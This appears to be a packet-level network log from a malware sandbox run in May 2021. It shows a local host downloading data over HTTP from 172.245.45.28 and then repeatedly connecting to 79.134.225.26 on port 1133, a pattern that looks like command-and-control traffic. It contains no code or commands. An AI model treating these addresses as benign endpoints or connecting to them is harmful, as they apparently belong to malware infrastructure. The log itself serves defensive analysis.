May 3, 2021 10:44:30.629853964 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629867077 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629875898 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629884005 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629894972 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629910946 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629923105 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629928112 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629934072 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629945993 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629954100 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629964113 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629972935 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629980087 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629990101 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629998922 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630007982 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630019903 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630022049 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630034924 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630043030 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630053997 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630059958 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630074024 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630084038 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630090952 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630100965 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630105972 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630119085 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630125046 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630134106 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630142927 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630151987 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630162001 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630168915 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630178928 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630188942 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630201101 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630202055 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630218029 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630218983 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630235910 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630237103 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630254984 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630255938 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630271912 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630275011 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630287886 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630290985 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630306005 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630306959 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630322933 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630326033 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630345106 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630345106 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630361080 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630362988 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630379915 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630381107 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630397081 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630405903 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630420923 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630424023 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630439043 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630440950 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630455971 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630462885 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630472898 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630480051 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630490065 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630496979 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630507946 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630515099 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630525112 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630530119 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630544901 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630546093 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630562067 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630563021 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630579948 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630585909 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630597115 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630599022 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630613089 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630614996 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630631924 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630633116 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630647898 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630649090 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630666971 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630670071 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630687952 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630690098 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630707026 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630717993 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630723953 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630733967 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630740881 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630748987 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630758047 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630767107 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630774021 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630781889 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630793095 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630800962 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630809069 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630817890 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630831003 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630831957 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630848885 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630848885 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630867004 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630867958 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630886078 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630887985 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630904913 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630908966 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630922079 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630923986 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630939007 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630942106 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630956888 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630958080 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630971909 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.630978107 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.630990028 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.631016016 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668190956 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668225050 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668239117 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668252945 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668266058 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668282986 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668297052 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668308973 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668328047 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668345928 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668364048 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668361902 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668379068 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668395996 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668396950 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668401003 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668405056 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668407917 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668410063 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668412924 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668415070 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668420076 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668427944 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668428898 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668441057 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668443918 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668457985 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668457985 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668464899 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668472052 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668484926 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668484926 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668493986 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668498039 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668505907 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668509960 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668519974 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668530941 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668546915 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668546915 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668560982 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668564081 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668576002 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668576956 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668586016 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668590069 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668602943 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668612003 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668621063 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668622971 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668628931 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668634892 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668648005 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668649912 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668662071 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668674946 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668679953 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668684959 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668689013 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668694019 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668709040 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668709040 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668721914 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668730021 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668740034 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668744087 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668746948 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668759108 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668775082 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668787003 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668795109 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668802977 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668816090 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668824911 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668828964 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668832064 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668834925 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668850899 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668864012 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668869019 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668869972 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668873072 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668880939 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668886900 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668900013 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668909073 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668914080 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668915987 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668920994 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668926954 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668943882 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668955088 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668956995 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668962002 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668970108 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.668978930 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668991089 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.668994904 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.669014931 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.669023037 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.832614899 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.832647085 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.832659006 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.832670927 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.832684994 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.832704067 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.832720995 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.832827091 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.832940102 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.832948923 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.832952023 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.832954884 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.832957029 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.832958937 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.977555990 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.977812052 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:31.033984900 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:31.034023046 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:31.034043074 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:31.034159899 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:31.034192085 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:31.034194946 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:31.634227037 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:38.316757917 CEST	49167	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:38.690738916 CEST	1133	49167	79.134.225.26	192.168.2.22
May 3, 2021 10:44:38.690834045 CEST	49167	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:38.796443939 CEST	49167	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:39.190963984 CEST	1133	49167	79.134.225.26	192.168.2.22
May 3, 2021 10:44:39.191096067 CEST	49167	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:39.330848932 CEST	1133	49167	79.134.225.26	192.168.2.22
May 3, 2021 10:44:39.330962896 CEST	49167	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:39.630950928 CEST	1133	49167	79.134.225.26	192.168.2.22
May 3, 2021 10:44:39.631042004 CEST	49167	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:39.790996075 CEST	1133	49167	79.134.225.26	192.168.2.22
May 3, 2021 10:44:39.791106939 CEST	49167	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:39.993215084 CEST	1133	49167	79.134.225.26	192.168.2.22
May 3, 2021 10:44:39.993343115 CEST	49167	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:40.291152954 CEST	1133	49167	79.134.225.26	192.168.2.22
May 3, 2021 10:44:40.291362047 CEST	49167	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:40.428138971 CEST	1133	49167	79.134.225.26	192.168.2.22
May 3, 2021 10:44:40.428229094 CEST	49167	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:40.561132908 CEST	49167	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:40.750991106 CEST	1133	49167	79.134.225.26	192.168.2.22
May 3, 2021 10:44:40.751096964 CEST	49167	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:40.830771923 CEST	1133	49167	79.134.225.26	192.168.2.22
May 3, 2021 10:44:40.830852985 CEST	49167	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:44.585153103 CEST	49168	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:44.938740969 CEST	1133	49168	79.134.225.26	192.168.2.22
May 3, 2021 10:44:44.938920975 CEST	49168	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:44.940704107 CEST	49168	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:45.331286907 CEST	1133	49168	79.134.225.26	192.168.2.22
May 3, 2021 10:44:45.331522942 CEST	49168	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:45.450805902 CEST	1133	49168	79.134.225.26	192.168.2.22
May 3, 2021 10:44:45.450948000 CEST	49168	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:45.734678984 CEST	1133	49168	79.134.225.26	192.168.2.22
May 3, 2021 10:44:45.734865904 CEST	49168	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:45.858683109 CEST	1133	49168	79.134.225.26	192.168.2.22
May 3, 2021 10:44:45.858849049 CEST	49168	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:46.099745035 CEST	1133	49168	79.134.225.26	192.168.2.22
May 3, 2021 10:44:46.099812984 CEST	49168	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:46.246776104 CEST	1133	49168	79.134.225.26	192.168.2.22
May 3, 2021 10:44:46.246921062 CEST	49168	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:46.519646883 CEST	1133	49168	79.134.225.26	192.168.2.22
May 3, 2021 10:44:46.519771099 CEST	49168	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:46.650697947 CEST	1133	49168	79.134.225.26	192.168.2.22
May 3, 2021 10:44:46.650866032 CEST	49168	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:46.721451998 CEST	49168	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:46.771322966 CEST	1133	49168	79.134.225.26	192.168.2.22
May 3, 2021 10:44:46.771440983 CEST	49168	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:46.891314983 CEST	1133	49168	79.134.225.26	192.168.2.22
May 3, 2021 10:44:46.891408920 CEST	49168	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:50.732048035 CEST	49169	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:51.078938961 CEST	1133	49169	79.134.225.26	192.168.2.22
May 3, 2021 10:44:51.080353975 CEST	49169	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:51.198975086 CEST	49169	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:51.570662022 CEST	1133	49169	79.134.225.26	192.168.2.22
May 3, 2021 10:44:55.568567038 CEST	49170	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:55.906827927 CEST	1133	49170	79.134.225.26	192.168.2.22
May 3, 2021 10:44:55.907109022 CEST	49170	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:55.908040047 CEST	49170	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:56.290915966 CEST	1133	49170	79.134.225.26	192.168.2.22
May 3, 2021 10:44:56.291131973 CEST	49170	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:56.571147919 CEST	1133	49170	79.134.225.26	192.168.2.22
May 3, 2021 10:44:56.571263075 CEST	49170	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:56.668284893 CEST	1133	49170	79.134.225.26	192.168.2.22
May 3, 2021 10:44:56.668484926 CEST	49170	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:56.971070051 CEST	1133	49170	79.134.225.26	192.168.2.22
May 3, 2021 10:44:56.971440077 CEST	49170	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:57.039019108 CEST	1133	49170	79.134.225.26	192.168.2.22
May 3, 2021 10:44:57.252190113 CEST	49170	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:57.370877981 CEST	1133	49170	79.134.225.26	192.168.2.22
May 3, 2021 10:44:57.371042967 CEST	49170	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:57.689270020 CEST	49170	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:57.749713898 CEST	1133	49170	79.134.225.26	192.168.2.22
May 3, 2021 10:44:57.749907017 CEST	49170	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:44:57.933692932 CEST	1133	49170	79.134.225.26	192.168.2.22
May 3, 2021 10:44:57.933778048 CEST	49170	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:01.700706005 CEST	49171	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:02.039141893 CEST	1133	49171	79.134.225.26	192.168.2.22
May 3, 2021 10:45:02.039339066 CEST	49171	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:02.040173054 CEST	49171	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:02.418330908 CEST	1133	49171	79.134.225.26	192.168.2.22
May 3, 2021 10:45:02.418473959 CEST	49171	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:02.537422895 CEST	1133	49171	79.134.225.26	192.168.2.22
May 3, 2021 10:45:02.537496090 CEST	49171	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:02.795833111 CEST	1133	49171	79.134.225.26	192.168.2.22
May 3, 2021 10:45:02.795963049 CEST	49171	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:02.930948019 CEST	1133	49171	79.134.225.26	192.168.2.22
May 3, 2021 10:45:03.259006023 CEST	1133	49171	79.134.225.26	192.168.2.22
May 3, 2021 10:45:03.260567904 CEST	49171	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:03.651338100 CEST	1133	49171	79.134.225.26	192.168.2.22
May 3, 2021 10:45:03.651443958 CEST	49171	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:03.867443085 CEST	49171	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:04.052256107 CEST	1133	49171	79.134.225.26	192.168.2.22
May 3, 2021 10:45:04.052330971 CEST	49171	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:04.178947926 CEST	1133	49171	79.134.225.26	192.168.2.22
May 3, 2021 10:45:04.179188967 CEST	49171	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:07.887254953 CEST	49172	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:08.220741987 CEST	1133	49172	79.134.225.26	192.168.2.22
